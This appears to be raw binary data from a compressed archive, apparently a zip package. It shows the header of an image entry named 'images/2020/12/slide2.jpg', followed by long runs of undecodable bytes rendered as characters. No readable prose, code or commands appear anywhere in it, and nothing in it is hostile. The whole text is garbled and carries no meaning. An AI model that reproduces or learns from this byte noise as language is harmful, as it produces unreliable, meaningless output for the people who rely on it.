H�3[��EUIf�L�{��pS��Nj�,�^�mT����ݤ�Q�d|����xQ��P��:_�
SC�K,lӡg�C���ZU�aP^�s�(GJ��)AZ�9JЈ�U�z��KT%�X���+o9b�V�s��3m����91u`Ki�g�e�aN+���7�-N��kX�1�29���@�)n4���@��d`�N�jH8)'|�$��n�p�A�Bm��]��e���^�vRm��`�+��
�y#���=͘�N����#t���5��zLni�8�@=�GݦL��8_�X�]�y7�l6��%b�����P|�nU����넶���z����#���0��<Ƚ|����5.1�Gx"*�3뼾Su�=0�� LF5��L��BT��JҴ&jy��gJ���J�1����W�8ҵ/���r��^g��Y@�y�)���gh��:@�9�1*V����bJ��+BT��3xB,}Y)�+j��]���v)2;Kh��:�=f��(���[�;�q)���^�(���'�Ru�h�j�F�!6ߘo}v���F��:t*+\m�c��P��7W1�Ǵ�˞�f�a!���Ӏ�/�H� ��m�v%U�\�X;�����#x�b
�axgQ�M+�|G `p5Y-��
1T�һ�舔���UI
D���j�w��-Z��x��#.���Om<C��JJ�s{�JE1R���!k�,e�;��=��*nw��^�@�� ��#T��7Uu�&�$\U���EQQa�Ht
�y�����̘B�0��@�0�x
�YmE��AZ��jn@Us`��H�͘)���``u�5��["]��y�E�����+b�89}q�(��S������O�(��t��ي�KEoa��k4�W��ɂ���|�á����#��s���΍��g噅U������Н��z?���zi��i�הp݁��z#{U��73�@���UĨ�{�y4��X=%<a�E�G�&6�S�Ը��X@�cߎ3/}�h����vA�ۂ��.\X�Pd|S��X��:C�8+=&������\t`�a��IL�'�滁*��R��u4�z3�>��\B;�[�
�^R�˗o<����ͯ��g8^���.�Ϳ���eW�	_�O�=�J�7�+�t��`z@�Џ�?�/+�7�h�_�Y;��=��?~p-[���eƧǬ fbA�6E�ur��a^!�	5BL�y�(O��y�xQ��gW�,��$�^B�q���\F�����<��ߤW�!�7�[��'��@��0KJ)�i~!P(9dv�͝W"���T�[��£xa�m���0�m�w����nR�8�	@�������(XRq���$�U��!g���"�fL[yH�b��%�y�V���ط�T
8!��fw��ŧ�-���b꫉@lZ�lU;8��
��|��w�T������V�mZ�t
�I`�P��Y��	�P9���潃���
>z\_��ͻ���,�@^�V+)�Z����t@�V*�҃�r�β��=*�9����Y@�{����I�r0�X��KDx������~�J���"N&���zE�B	���bln[E�����U�^R�3�=Km���1�R�J"A�0���9�%����(�7OX�2��������?�^.���:��*�5�����}�®37�o��[���o��ktO���]Au��?�I߄˿Q�"�)|W�wDDu�<�	L!#���B1žA��4�˗J�����q��i��m
�Z�}�K�T�%�K̹z�b1?����`���(���T=���٩�#�	S��\�|�JҮ�P4J��#2�/x��q�6W&��C�?M�Q�����?�x�я<��n�ƃ���s��j�)���^t�T��t��0�m����"�͹���B��ck�w��f�]sYsay�1o��L��^or�~�zD�L?�A��KZ �������*�^A��PG]�Eۛ��Pz�tr��w�s�5������@3Xn���&G�VI�����us哚Y��]�;
�DYe�Qc9]VrQ]��}�6B��8�F�T�˓�P
V_(���DR���.�6vu��7x���"0�X5�p/�ې�#������V��[�`ơ��`�b�!y�l90�R�|�+$2@���
��b�h����M�+�L��Y��Q���UW� �7	�u%#��f��V�N�dPC��˗��q��\,_N
���f�R�з跉Ab����3`la0���˗.\�r�)a��|	_�?�?
):��9/k~[��Q�fn�e
"v��/�ǷNe����r��sn�g���9����j%?O�x ����@��;�o=� ��Vl7����E/�O8�FIR���)�u^J�
]B��ut�����}֜�-x�ߏۧ�0`��/D��?�����`��x�x�7Ҵ�J���R��|'���
�@⸕-<�GO�66�wetq9����ώ^ٛM�mwІ�b�*�7�V��IM�II��#_�Z����E����7>S���Q�������1߉m��L�"�{���6��0�~1.Y��8Y:o��\י܈PX���lD�Zmj�D䰖��>�C�Z�4�%���1�s�1U,��`M��E7v��i��p�#P�)E�׬�"7�G����B��n�Z:���ݥ:�vԽ�!�2ASx��f�,q�;���T��TX	v/8��ܔ
�V٧q� ��9R�İGΉktl�\F<ԕR�B�i���Uʥ�W��FjSG��;)v��a��X�wpr�
�e����!aUgX(�S�W�*52�XA1һW+�\	[���#��Cڝ�EUo��bGH�1a��Wdȫ	LZ�&��	��@ߤ:�:\���˗���iL�6�x1.6c���8��U�K���C�o[���f���g3���h_���z����kߙ��%�ZT�R�k�lcި�<5*C��Rw�&<w>g�\/[<	��2���Z˽���_�\{L�s�)��3��jV�g�%BT
��n�S0�"|�TQ�S�n7��16߉�n���%_��
X.p�Κ��,�'WId�d�Y,���-ِ-�wq��b���#�s�2��_#f��M�c�A����o������j{Į��S39��LfU�6�<>}b���[���>��7ɉZ�oX��/Y��h�&^𡕉k����@�n5�"�bm�傥�i8�Fŀdߑ��\�Ioy�ȱ�R���n~�R
�9}�SJͻv�r@��}���0�)�90L�9�>T�W��c�+;$���������+d�ͶQ��Z��>��#�R�v��Ԋ*�a!��xXo�~e�l�Y��o9P����@��n�X;���t㙑ՠ�-��}L�`	�c��q�,���F�"�w�}�����st��}F-�����`�����;w�(�I�MTݗv����F�1.\�r���/��	bQtyJ���U����J/���8�6`3�a������z�$.'v��z�u7c�^�퉎�% �"��L�J�+WN�g�k^�P!�b�A��}����1�c�g���\x*zA`˗.v�zA��W��`���M�������	��Z�T%N!-\ܫ����d�G�2ݲ�͖��:�?��v��6S���d�o��e�=f����yL���$��*��Piܔ�����\C0���r>��z���7�l�7����!�1-)�?�]���Q����8{��&rA�x����֭���s/��������o�ߥčlq(6�5��]V瘔�H�G>�}<4g��F*ܖ�}��/���{P�@k��!*�jۜ`�+Jd��^h��K��b("�.��<��$���ܽ�!m��[.k����\)�9VS��oɠ��
ܑ����O(v	��:�-��Bl�U���UK��w׬Q�υ&e��S�?
=M�[���GʝC�
��v������"tE��//�f#We�=�P�W�o�@�j�bt*8��	qZ����[`ٓ���a(��@Ὑei�_��E-��q���������3�n��F�2�ݩ�G�E�K�.\�\Η��K��}��]��q���%��˿�ؘ(�r`en���ѽ���d�q��B8��

�2��^�7j^�3e�7nP�n�n�t8E+?d�<��Pv�y���<g��!�.��?�m��O�O��Ι���Ng~!��S�R��2�Ń��bT��G~!�J���R�i^�*V�4��R��1;��z�f�j��`l����w���-�c�(%�Eem���@?S%�@\٢�#����*3(�بś{Ψ �x�na#��~�!OAyUp�Џ��n��97|T�o/���6�:��^R������u�7�ky����S��^Ѣ�~R���E��=��q�.�#S��`�Iؑ��s�#�Ϥ�k�o׏�
��Ņ��7��-�B��ض�3�-���,X���ia�:{AU�5e-�򌙧o%v�����lZ.�c�)��2�-8)ʗО�����KK��S{�n��!�Vn�N�ގ�N��2��Xep�
iR���z��(����ڿ>@��"��!��(;pv�Ӕ��h�(���;4�Zf 6r�z5���Wɉm����]0v������y_�Y�u��z��&����-�QSl��v���/��f�����"��<���AL�r-���eyL>�`[�L�Qg*o��~�'0&�Q,�X9�yaqyģ��1ZRm.�0L�A�y{�^��Z 
#��@J����,���|&�J�~ߡJ��N��c#����i��J�e�xRT�K�?~gY}'�?2���s�hO�o/N��T���fT��o8:@�m�l
�l�+WC�R�k\BV��fV�7ڢp�Cjʣl��zN�1��!����^Pc��R���r9ܔm��AG��0��/j����$��`��̸��\$8�%s(���j����J��ot{Fv�(�ܳj����pK�?��������6;缠�Yt峬n�$S�fy7�88��J�s�[r�m̯����S2W7Q�׻���\���>���i̴9l�����Z�V����� �b�-��l�e"07��
M�ɜYD���A�4���Ya�Y��^"�+'i|�Da���������Zƕ��T8���]x�3�]����
]~���X��wTs��o(0.ǞN�؂�ɋS��(�yJ�E5�pR����t�Ij�=�g�޵s����'�d�����y����=1���v���X�oa��p�m�"��"��;���V��|�+�;3
�{q�J��������4���-G�
����b��K�^�/K�^�zBx���ŝ��Xw��*�a��T	�8H��K����H(�p���|z�C��!���c�jm���O�6�"n$���|�D�U��eCº�O�/O]._��^������i�_��+J���F�gY�m'����ʟg���*����b��nd��V�rz��+M����S�(������E%#�)%î��1�n����z#���b��ګ�%>�ȇ�3%���Ps[�;�ϗJL��Yݮ��"�o�h��R��������[-U<��#�V�<�V2<��j��̬��*E�뙞�
�h��?��x۬'xp�D�9]�v[��]%ym�'�v��u���(#)
��U��q�#��m�'�

�w8���`����TLW`�����_b��tJ
��[q{�e�]�P��5�䣞��A�-�9��spB���d��(�.�"��E���,p��~/%���E�B̧Y���W-�~�,aa�.�����~�������hH-w�Tk�L������Dl�?̷���f��a3����C��e�)��z#�[�Wh�u
-_�iBZ���A�w��bg�M�q��c�)����sjo�1e�� �9q���6�:m��3Ώ��W�.\�~��K#h�fA��;���⪛V�*W��g�����?������H����-��Dm�M���o�!�b˗�O�@ӈ�b^�.f_2�~
��d�5�k�O�7�*VfbӶYT��6�0<�z���+�]5�+�^�gU�"D�@\pE#�8�m
�\*����d��sMG	T۸���3�G*^'P"*���n#��v��\8��$����-�����6��;s,�"���,e����g|�,���ɞظ���as��K.�1[;bJ��J�tE{^Ί%����/�\�.m8n|�|/x���
��s�A���I@`8Ů�����n��ړ�@�.K^x�0���Ѝlr괠Z�"�nP�6՘S���Ţw�U2r%Žl
��X e.�;*M���ż+�U@5�zPPXQ�Z��f�sU�Xp������v�1.��2j(sŐɑW�������+a����6{��]�o���"A��߹���f��������N�W
��{ۼA�	�o��7^�b��օ�!�]M�s�-_�-�-�Y-ō�p������k�7*�A�k���p.�	
��_ѽo[�	I�hA�	R�x�CK�HJr+}�#�u<�<7��0Һ��Nҥiǎ��Bf�q3��W���^5"h�X0��U�n+��1��U��J���ފ'
3��<h�o_pv�nc�2��/�x�.���n%pJ�n/�A۶fQ���K���
�/�t-�{[6�{��?� ^����LhqpN�*֭\���ZrhG�4�F�^�`T�%ߛ�ź���ܕl��}%�����j���t���%Y�.}'djw���N�I��Y�彷�^�+�
�Ԡ�>X�����}k�w��,*p���|�s��7�@�>��G���ˤt���7l�����ᗈm[�b[l?ǫ�P�����b�;������[������%�m�%D*��ˠN2M�-q�,
�,��"�h+o��:���lDЌ. U`l�[�t���K �֭YXl��飛zg���)�Հ���r��-<��#B%�kɼc�b�i���Y�j�{� X�X�a��r��#w�vX����3�K�T�:��1��h� ���!�t�3�;Yױ�Ŋ�/��(���@u���d �@�h�v���������n^�%BT2��j�x�躞�

Xʆ��bJ��J멻E{��w�	z�^<,�r����YH(�m�!�W�h�5̭M�A��ᙄ�������V��y���9��n�w�����%��
��069<�0m�[�Ph�PP1���iC��;���F�S1��3���0�|yu;J\�D�����
�[^� l�%��H�v�I����2���q��LM�<�7g��+o���\����s�{�A<"�rWIO�s�D�v��<�zM��>F-^������H<���l/k�,n;�1��.ᎡW�[�0#��/c�;���ڿ� @Z)��>
-� �WJ�E��C�6
%x��o�-+"�q��}Xg��2e��e��$k{����`x���\��5%l]�$��Ў3�BTU�6��s9��~�� T�{�l(6����&nK=��L��w?ŠV��c=(Zp���U)��}}���x�e05�J��l(���� ���Ā�p�s�+q+s�s�~�nL_R9������J�����=#Y@�H�
�z^��t%@��]MoGS��C��
oS��L�	���ʕ�ʷ����M�wh�b��t�%�56��s:���n�3��W0�m��1R;���Dv��\�9� XMѩ�ܯ�u��R`v���̶����n����zt�c{��]�MFZc�=嵩��`RdN�=���y=#���)"�dkMq���?�+[��|bd�Fੜ��E�eI��*W.gH��-{���×\�i�8�e3Y1���Z�a��g�8[�&ޝ\L���D=O(1�W�Iy�{&Y����$uiI���S��j���*��oL[/m��w�q��7��F��C]�C��@�ڠU��wv���ochFp�)��F�"�����Uw�n 2*�U�QK\
/�d���U����e}l��M]ˇif)�W�bq:C�@t�aU��@����!��)@�-سyH���
��o�4��6�GD"J!�8/w�uX
���E<�0)�ż�o��.a��#h(м�\�7l?�H�	I�ra_�l���
GV���aT�V
5R,��Жo�k;^Q�r�n/�G�c~����r�˗����1B\�h�[�\]Hx�M/WRA��a�
��
�W3	�#
w3r��.\��1���\;�����q�8�*�������V���+�	6׬��(��B�ݧy%J�\��W�)��s�=YB�<<�y�-�{�i�vgك�C0��������`�Z#�1���T�y��-e��(��
�ш�%�۟8���qO�a ]�Q��j��=�
�m�+t�#r������3������+�uY����k�bi�~��Woo)q�ի�Y�L
ϖ �s�'�n��Cv
%'c�d�qD�?�C)�%�F���]���|��f�tn�n<��w����b�)�_����K�h���X5�c���(�c��+Qzz�Թ*���H�(����>7-�YN�G�q�����S��+�
o{�JA����K1��S	|w�.�J/;WX4e�d�]�#z��L �낋s�;v�
�2�$0^6�c�2˫Ƃ�(���j�H��6ک����Z�Sl��pgE]����b����z\�/[�B�5�	�h�MoGB��!�t4�pvϔn���.��/�xyc��~��2�\z=�b�M������5�����30 \t�I��ِ~�>ì8�I�}<G���-ïT�ګ��E�P��wj*Tb�+�_-�+Փ�
]�8<��v� ���iN�_��3�n9[���LD�� <�:�._�2�(��W���҈	^�\̰p�Y����|��w�����#�؈Ү��,�uҼ�7���!�䲚��Y���
�n�N\� ˀ���r�Fk<�P�Z���Յ/�s9�}��QH�#�Wm���¥e�y�B+2����H7e��!�dsݻ�����=�o�����Cn�`|���b3`N7��f�/�n�*�ol���8���c�(`���)�j����V��BZ89��DM.L�]�
�S{(���b�OT>3f���0cB_����u����D����9r�[��7�6o�=a�B*�D!]�@@��b,,ҷ˻�-]��`�Il�x��sZ:^�/�r�˗R�˟�r��Ԅ<�\q�'�ю�4�r�!�u!
WSO-Ftg��:��=�w��������]6���܉�H�*T;J��+�fQ*T	P8��̩��%�k��w�`vo�������_��
�(� ��\:�y�Q,�*l���g����/e������+��"�I��/Mp�:�L�W�@��ͳ��0���e%˗.\�i�Y��Jp�-���~%��$m�����Y�&/�Ȋ�gK0���!ľ�0F�
�O�7�W8�#T\%Q�%�y��b��«�P6
[l�؍�1�DEЗR�o�U��0��Y]��]�ʁ{�}��9�����G"q�}aW"�˧K��e�.���*p8ef+Q��}��p9A��v��O�oj�k�`{����j�v�� ���{�0��0m^Wzp�~�eȣ�~���Z߉Uٕ>�#���j>]ٓ���3�,8�,��f��9q��y�l[��E�ŪFޥU�3�on��B��!�(���v���$Q���/K�.\�r�˗.\�r�0��,�p`�Z�Ԇ����5c�hh�ԇ���0�C)he!��]LS�%��@��3�2�+�׬�v�R��T�:h(�ķlf
�ȝ}e�Xٗ{E�P���e�e�|f
g��[�
/Q�*U형)����̡&Pݛ�^Q/���/�Z�
[j!�4��/<u�O��o��j+9����:=Hӓ�e}`^p�Pu�-#�ko��jB�fE�l��̋[:�F�.^���:�����aE/�I�ղ{?qwE�9�9�-L��hP|'ly�Q�W�0����x]VrJ�̸��4�U���I�wT9^�;��Žm۫(.sx��#q]��o�5*���D_p;�PzA.`fj"��
'."�`�����K��z���
�UV��*��Ok�Z�E�S��HAk������nh��-�r�9 �oT�Y��E<�`�11Eн������`Ć��3�h���1�����zg�64,u�[�/�K�.\�r��r��-W(K�*T
+F$���c��r��	���y�b�Sd�y�w�4��o�Y̸C�P>�D��x�=�(��P�dv��!P��S�q*�t�����A�R�z�]e�$cN�Rt<w��*4���h��t%AU��(;SUj!�4�
�U�KU�҅��1�_�
���}`g��Kޏ�X�1�8Ǭv&/sDC�Hİ�nV��J���zd��+/?y�9WY�7G�x%�	=���6}�V��~r�v2��oH
;%�R�[�<�6�l�]} Z+�ݏU�(�r�+�d��g9��\n)��Q�b���*s%�U�Ͱ2�=��
m+a��GU
?�8��W�; �`��ۺO�Ű���x����{W1��ݘ��ML�xm���r3���*N�9��eR�JU\vO��5�L��]8�,a:W�b�U���}fIڲ�4�&Jfj�=��v�|J��u˷")�Z�\�Y��e˗\�ir��r��z.\P�(8���P`��u4utS��B�r�.\!�	�}��G��K��^����˜K����_���������0������n9c�LiL��aS�=���+̈́g(��!�
��bX��2�G�s���Zf;≆Q�2�a�(��O�O�6��_΢G�
��o�/1J��Jʻ6IA��XR�ݎO�{��?�����S�?����q�<䭀4mD�
�AL�W�2��9�}�U�C˗5��G�DmK��u�����B��Y�[�U;N���,�iQ��\ub_URS�"BUЕ�%o���{J��ќq,
7~�����oe|
� �L���
�u����T�6]���S*eY�I�="\Sc+5�=�%�R�;c������
�-P�Q/��8Ed��݊zP��\����� \�_�K
�W@PϺ��o��j…�M�u\�	�J�r�ŋ.\��e˗/0e˗����
 �!:����X�.\Yz��o�ir���Kq�K�_2�e˗,�.Y>���.,%������s݋a����⹏
%�t�f�|?�V��|�Z1��)ڥD:�X�m�vvJ��D	P^�R�n�~%��+
iO�φ�ЂW�k���17[���%l��\f
力�㙶����l<t�"
AA�3�/�\��ew՞^�H�o��gKmD�oX8F{�A���gh�wv���rƜ�XXVNX���Ǥзw��v���z����P;����H)���ylqϪp��ٵ��r�9GH.�^�
�6��x�6�q�`�9U�؎ R��T
��Ts怭�:��]ѐ�~*dW�
��Z�V���E�\e�����W"`�Ņ�>~p͛l�h����%��M�DK
�+p�=�-�*��~U�VՌt�h�WX)t"��z��Yr���Yr�������1z(h���AC�r��Q�a�b��2�!�Yp���Οg�G��f}�����Fjf�o\���8�~���B_o���ݥ����
3�:hC���Ξm���^�_�.�^~'�)
V%��������UOM�͈��l��aQ��uغM�Lߜ��s[qZϼ�~=�l��f(�R���
�^g���߿3bm�'��9��_���['��e�=�����2��7�M�����(��=��ω�ٛ��N:⮦�W��/�5��;�+����_������g�p���U�e����ٞ�=z�����6�)�gx�l1wWwl��/c��*w�l��n�n�m�7)�ޝ��o7�lU��]g�2t�(V~��?���`��;j���v�Z��/n�]��h���|פ��o�kw?�yTW�a����c�WW�L�L����5��=fo>�L��g?53S�wv���h�m-6B�1��:��:f�Վ���PK���Q��'����images/2020/12/slide2.jpg��X[�>�Nh�D@��@���"��t��^�A#��{��A t���B�wi
ҋ�T��;���~�>���(�̞�]�]k�g����=�t3����R�?��ve_�K ����C�	�}|��ܽaֶ6v0���P��!�� {#�5��·����]������Vj"�-�}G���I-��� H�䂖��ސg�
���q��fpsu���A�~����j��"Uğ`Gj�+yxٱK���E�E�%�a"ׅ�E��E�E$��%�D��E����b���`o^��p}e����A������yx9�HKK	�
��
�-��}�ݽ9��A����t���Ý������G
����?�����������������G���wko�;vB�v��^h;�9'��;p%/;k/C�?R�u����v�î����;�������7�k������>��h;ue9(x��dGH^�.�P����@\W�PW�P��"�P��s��������ϵ���V�_�ś�����lU�<����;��X$�},������\��k����?�s� ��L���۹����_��/Q�]�AjBB2h���3�$�y 8GLLLB|����9�%ٹsd�T��ͯ?�4T44�44T���W�\a��!%%�p��eZ��lLtLl���~��hH	��a!4
����+�3B ��b!1�9���{� ���B@CH�NK$���!"z��J*v����)�ŠD�' >GFBxBJ����s�(�т)X{BE�u$�!�/Yt�و}��|��d@G\x砾�%N?��F���B��hh�`8�u��Gk� z��;�m���@�A-�Ȯg-��	vRP�i�՝�����qҀ͖�I�La"@��G��G*��7]�Kk�k�6\


-�Er^�H��$�J#��1�"�Ҋ�]���)��kxm!���C�զR#�D0}���K$&�#��Eyk��%jջ�P`-[��b+Qvu>��s����h����]������}_�����H�h�`��1��}�2,ٍd�H������ε}�'�����#���""�:�B�n����O��|��o,AB��c��H��6ߜ]��BwȲ�Xn�X��T%���A3C�$���<�0��Pir0ƹVnqac�v��wJb��˲�v=҆����Q���;3�d"�D҄���Yi���T�T]�C��!��C8�N���,�a�3�Ij(0�s��,�`�.{�Wc*�ؚ�����L�?�i�#�+������O�Ä�S�B3�L�6����D�}��ö�/��r�#�ɓ=]��*>�b�Mr�ks�?g�0�����Ї/��z�Y�⑧�"Ҫ@��hH'����" ����A\.|�=p�x�J���*u��_�eNx����������
��®L�aԡivJ��,H*#&$P@v%P�7���gӟ�ux�H;e�"kH��L�j~T�`�mM@�|�+�\c3�=rO>�XH.�+�s�[�Y���浬�r*U�Dƅ���e�� Ɗz`R e"�P�J5�Xa!\���|qyn�(R5)�V�Ԍ�?[��z�fR�L`HD�U�RS�PK�#	�
��J���Ò�@P1� �%��&��?.�;����]R�Zr�O�c���C��۷�/8���Nn��-|���t.��v�Ǥ.'_5�b
t�oLO���A����4HWW��ݫ�A�B!xU�l7�4���DG�w��w�Š�@!!3�ٖ֗�9,,8d-�܀�]��L��h�31Qh�f�'{�sno�B����[�Sc
{pv����R�o�H4�G,��ur2
�?�u�&�GY:��N5���p�J�+Ċ[��jQ��0K ��̩�)1TotD]B!Ų��T�s!�#_�I�����W,h౎1�۔���F-P����p�B����Wt�\MH ��CB�P�2C�O���*Q~v�k�o��08\}�#]���}���6Q�o��\��Ei���R�
l�8Gʥ�_�Ѭ���w�3�g�dUϻU5O@'��������=��ĩGMѕ��"W��+��`�$�	�1
�I|���r��aN�p�BCx�Gj9�>�7*�5��,������$�
�)	C0}��&p�S����&�B�tƢ�սhn�P�x8�ߔ�,��;����Q�5����.�!���G��~=�d�,�V�H�6������y�R�Ua��$>�54�U!@��Z�J����11iTC���50Nq"j�H�T;Rҁ�9կ�Б;d�N�M��`���R5�6@G�����h�.JY�ףu��zC.��:g[_��B�J/M��w�t��\�.�\l�RB}3p5:}�� �����'b�v�rPr�]	���N�!)���ǩ"}&���l�~�|��fg�4Pv�Q�����$�E�d�߸����0��;9Dԗ�ݹ�iFy�aIi��09�Z����]Z����|�J`�b��D0iu26M���p���V/���\�@�1|v�,�;9���/b�55\�0��S�gs(K��8�����Ӯ�MfD��_���lR�$�H�R�1�ر/2)����7Fv�(ٕ#0
�5?|�����4��%���J�G�U��@u��]��Pm|�I��@)Q4�yȨ�!S�@�(��5���\�L&�jRb�}+A����o{��<��&�piw�a�����g���u,֧��t;s�_����ie�F�y�9�[�U��
\7[���m�[�!��LD%Jn�I�DQj9.�ȍ���4�aL�z45����t��������`H�"��ق�f���_c%���!R�E��$1��L�9p�[�6�ܴ���\]%��E�~��&4T��ӈ&0*}�{��߮��W��rgnr����n�Y:���Gz���i�c
o�O6m�%P���~�7�FODꂮ��@	^��Ɂ_��;�V��c5�a"��^��������f�|>��`ה��{OU�����&A0�|7�Ł��W����5
7�q(�L15���[���\_) x[��YfOM�qR*��"Nr\�C|�����.�?D��x?���N����\�=!�k�nV�<�*�SR
o�ݿ#"���y,>�+(xp7�i�7�QeL��4(W�}��]�£'z4�0�A�r�失2�dlO��NOp�*�f�ԗ����'Lp����ʾo��ʑ��E�a94w�B_+k
J�kt4e6Z�*||��uzbyf�E��&�d�s��Z+R�֥��';wO�w�Yk=
��B�z�|KC�6��+s0��w��X	��C"������A�;ș�#�f���	��	�T3H-b�J���p�<�"���D(I�ꮙ��db%$��b4�R!��c4Sh��D/���o����?�V�w�n�����jL(v-�G:����o�
��#�&4�-��}��٘���,i09�)��h�����?�=ykq���+�tƱ�"��4���L��C=��H/%0��uP ���$A[.ɩ��
�r^�;���	���N^�M�HJ���Q�v(3DqpQ�#����ϳ��#B��6������J)oK��[z#5y���F�Q�
�CX�e�֗u�&�Fi���f�Ml��\qv��v�:.�>�AS�a2��|�~FO<�.5�I�Kߕ� ��KC�n��c�W,����+n��������7T#K�0)�
��&�I�}�6���XE�14IIDo�����9����Z	�]'��'D`PuJ*�`��T�(�$pA�頃�Mk�df5'�d�Q�Ѕ~���>�7���H|
V�7D��;7��=W����>�Y=܄�T���UϹ䝵w��i8�����1O�>}�n�ɟ�HQC��XI��,|��כ�"|����V
�T�0�;R�Nd�a��1/�Ec�	�#4�@u+ћ�v>E
���~3E�
P(z3U����Q��~�h�N����鋝+�S��:�砩����}k��q��4&�M��\�-�=��M|�����V���H(ߩs~A�8i�B�h[�HQh��Ty�B���,����
r+@\7��U%q�
 �\.����O�UU_�"��%�>c�$&�:����~��+�$"�BBn�|�+a&|�
9Z2�f�A�ힽ/=i�A�(�t�=�5��M;6W���9����Pz��C�omގn��)���!դ���_u�i�Bs���8���K��jhXjIA���e��Q�J����Go��C$E��:;�o�>[�{��eU(�(�Q�
h�]s��0�k7�E�U�r�Q��ܩn������:jmhv�M��}DX_�?m�ݘ�^��~PfpsH�[oT|�64��gߤHZwW������^F��
��lA7U�F�W:/�C�_�q��X������d��*�|<�_������t�8H�0>��2gZ�]nn�
htY��a���;e5�q_���7���`�	��M�=e!d��a��&�/�2#99J�j}.Q+��9VU�,T�:�Py��\���47ֶ��ig+v�)Y�d:tC&��84�5!]m�/�䂳5���h�G�M���r��+��O���W�*@���/�=��9x��TV�c�g"ED�����R��ד
�R�0C��xxU��_�Q�Y0�
9H�
��O,�">����A/��0�j�.66k&�tߪq�M��D���v����Sa#��W�U�
�B�A?���G����t��%���y�U:�j�X���?�D��X{	�O���<K�r�U�x��=�{�_aAi�fhH:��Ó�6�F�<W���Hz�R݀�
�=a&`ಅ|�ٷ	��K�δ=&Y"E���;���ov[_��cTY6�'r��wr�M3����,}�Nδ������t)`i��)��m��Jp�[��Ы�tMl�l���p���gGK���B58�߁�Į�xau��FX�R"�Ԉ
�]�-�ŌjY�Ї�V� K����6ɉ/c<�/��2��+d"���.G�_�0��q�B�����
'�c4���,g`@�L;�E���:]�\�)����v��5���>�q9cfl!�C��w��Ǥ�~����H�sIG��"�V�;���J���>J|�����(=<B�Bb�o�`�~��F���l�K2���w�̰������3�+糓s=��6��r"�R�vR�hH>��Z,�KP�}�\����Mr�rK�M Ү\ꂕ�Ci��q(���j1��A���Ԗ�c���Ǖ>27_i�/�rY	��j�އ����,Ӽ�:'��!\�RK�����|F`� ���`�|�}�Ǒ�+��S�0m��X�Hш�}�w�.ga�$�<�*'�L��k�����^�"��o��U�;�����[	�g�o�n���,�֦��Nݱ����i!���p��e���ޜ@_W�w��we�����&g�ߡץ�X:�h�,h�N9�Z,���y*I�U
ݯe���;jj25+#Z����22�&��I�H��^q��bAGY�.�M��gn4%��n�#T�D��w�Zٲ���%���sM%����7;���,���:��u)s�NFu��GGح{�'�3f�:Vb��<��~w���7@҃��촕����7ex[����ƒm��؉dR<�b���J�a.m��7��Pk�n�h.�w�?��*�ç�d��ʑ(k<�*��!�u1$�F�]V�,� @J�H6��]n�؟�>:���ڴ$�L5�<c�!ZF`
�.A�u��r���@e:���
f��Lg���3��n�=��v��`{��=�/��|�u;rD�"��u�
#ij.���g�)�|T%1;5@@����H�Q�9��ۊ�ĺ}4�(V?�˻�W[N��G���DU+��%��	��T�ݑ�H~�h�lq�`�
��lj���Ϧ�?o��=s�D�.��e�'skh��"��t�'n6�o�΍-�pa��G-��J�w���?ۿ�(���s?Z��UUM���@������㞆�����2�,V����C���A
T(v�4*�Z�?O"���!)$�#����{�)!��x��H�8I�
<",Tt��2QeB���:����P|i�|�C�ݐ�scfS�X��)��:�*��6m�Y?���m�*�V3y:���-|����͌l���o��\=Ҫ[����P)֔���
զx�g���N�53R�p�_��HBjR15����C�@���΀��:R�!��F�5�<U͑�*�S@$IA�`�J��G��㖏789BɻHtp��G2�n-	j&�D(�=�r�"�7��Ѕ��{�$�6d�m����~g�}�ga�jKc�a�%`�����4b�<���P&TCeQ��n:ԛю����M�t��1s�[�t\j���P��u�\���K�y����c�'�6D�~�
�X����|�bJJ�dDJ���ܰ���)X9
p��(�ӖsE���O�g�6>�p	Cƀ�9'a&&N�����O-qH���B��q��j��=:��y��Q�i�0��n�C>K�*�ur
�d�{�%W�tY�)�-7}bu׃�P�M���_*��y?Ho�1�O>2��`7���R��Ê	���.x��1�	1�~R�(rvr�|�w	v�7�<��D�h��d��6F����2�~�n$���xT�v3�7��r���É**����V(>�%IX8cf�yk����J��.c"��pspۉȴt�F���%���޷�z��#�/s�jw�W���74/�VG��IT�v1�,���]�O:iϞޱ�rN�#ڻ澭�Auۘ���AL�|~�0�;@��\b�ˬ�4���܀U�#9�]��7���繄)1�To;�s�yxh\�	%$�dg2P�R�.H�("��v�|U�����wr�P�]��j�z��3���dVZ�������H�5Q��?R��y�1��7�k;�����+>tKҳ*��y�C`$I��,�j�����ՙ�#�U�)}�_����#�E��P���1��4M +k�S {
�47�)	D��8����z�#K+�k
V�`V�t����F��Lz�3.a&v	Z_OL?Z�MaF�	��
������nX��o���K��4��%�<aue�fs�n�\{�|8��G�R��{_܀�g
�vҿ��d����@���\kz�Ւ�D���	4�s��G��e�$��b��K����s}�
	ke��_��:��QT&T�WP �2�idje�'��Vy-Yh�&tY�֪O�z$�ټL�t`�ʮ�J2��ב����V!}� ��24�v��KG8O{L�'!
�Qn�.b-XM��憎�~�এ9Fk�묁�6����!����[��A�������sU�,i�~�@�B#��~�t�)���T"%���C���xv/˺���# �%.?�㋵�,Dݨ��BB�]�Cu�>��-���A�Y	3���!1$"`�X�3s���~�V�LZ�ц���H1庳��قA\<K���2�mܓ����޷ñ�;���E0����t�2�ħ�uKH��D�י�-\��j�̮�b*���G�Y���\�F�9P��z�Z�gr1�̵��y�E�JdT0��w�%A�eC� ��Ԩ2�xE�3~��j������Q���n�)~Ňi��lx��I
�$��&B#;&r�����}Q�/u�����7LJqծ,�Q���=����'s�-�G`��i�'A^�z%�&�(��!Ms���{��`ws�ܫ��4��?��_}>���mʹ�8��1��*'%�IӖ���"�
0		�#�(tJ�	;�pJw#R�VM�h�jJn"���l�~�&y)���1��ô�\�P
�ΠƁjm�X��E�i�,����Z�o��"��-{y�C;�.
�֓�ܣ�s���J.V>'��̡/�Q~u7�;�-˗��O4�vz�l���uM�?	�v/^з�R�eS��]x��wQ�{�)�n˨}r�D6��;Y������y�ѭ`6�1<��m ��5�@���}tw|GX�%P���QԴ:8��Y�R�JPF��u24����zH����'��L!��6�������W"Oq���4	M�G�&�[�r̯&��!u5ɝ�Ҝ5p�iu��01-熢v�e�j���v~)�aV؆��QکqCz�}r�HY�aPk��&��h��R��PU�f��[z>=��~ �yJ���g'���⸿I,��ꦭ�W>����Kz �B50���&N\U�e��'�A~�>a���d��Z2���H)��7����?���T���^-��yv���_�:�ޢWv}��H�˶PyQֺ�gn�(
ޟm����X�Ybky�e�k��d�n�|�ć�:v����e��S�p�Ά9[���VY��A���|��hC�E쭽���.��Rcm�a��F�<�om��G+��C+ ���XDC
��V��`�$��
